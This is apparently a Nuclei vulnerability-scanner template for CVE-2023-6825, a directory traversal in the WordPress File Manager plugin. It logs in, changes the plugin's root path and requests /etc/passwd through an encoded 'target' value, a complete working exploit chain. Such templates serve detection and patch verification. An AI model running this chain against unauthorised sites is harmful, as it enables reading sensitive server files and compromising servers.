id: CVE-2023-6825 info: name: WordPress File Manager <= 7.2.1 - Directory Traversal author: pussycat0x severity: critical description: | File Manager and File Manager Pro plugins for WordPress versions up to 7.2.1 and 8.3.4 contain a directory traversal caused by the 'target' parameter in mk_file_folder_manager_action_callback_shortcode, letting attackers read arbitrary files and upload files outside designated directories, exploit requires administrator privileges for free version and can be exploited by lower-level users in Pro version. impact: | Attackers can read sensitive files and upload files outside permitted directories, potentially leading to information disclosure and server compromise. remediation: | Update to the latest versions of the plugins, beyond 7.2.1 for free and 8.3.4 for Pro, or disable the plugins until patched. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804 - https://plugins.trac.wordpress.org/changeset/3023403 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N cvss-score: 9.9 cve-id: CVE-2023-6825 epss-score: 0.06009 epss-percentile: 0.92393 cwe-id: CWE-22 metadata: verified: true max-request: 5 vendor: mndpsingh287 product: file-manager shodan-query: http.component:"WordPress" fofa-query: body="wp-file-manager" tags: cve,cve2023,wordpress,wp-plugin,wp-file-manager,lfi flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "File Manager")' - 'compare_versions(version, "<= 7.2.1")' condition: and internal: true extractors: - type: regex name: version part: body group: 1 regex: - '(?i)Stable\s+tag:\s*([0-9.]+)' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 - | GET /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded public_path=%2F&wp_filemanager_root_nonce_field={{pref_nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp_file_manager_preferences&submit=Save+Changes - | GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce={{fm_nonce}} redirects: true max-redirects: 3 extractors: - type: regex name: pref_nonce part: body_2 group: 1 regex: - 'wp_filemanager_root_nonce_field"[^>]*value="([a-f0-9]+)"' internal: true - type: regex name: fm_nonce part: body_4 group: 1 regex: - '"nonce"\s*:\s*"([a-f0-9]+)"' internal: true matchers-condition: and matchers: - type: dsl dsl: - 'status_code_5 == 200' - 'regex("root:.*:0:0:", body_5)' condition: and # digest: 490a0046304402207fe03a88e8af448b7d7a28ba99bb724822264ffaf00891eb5b1b5d310099c02002200f16d04d60685d7055da6f4b09ba489a08b73a917f1c51b3142590748a6179cf:922c64590222798bb761d5b6d8e72950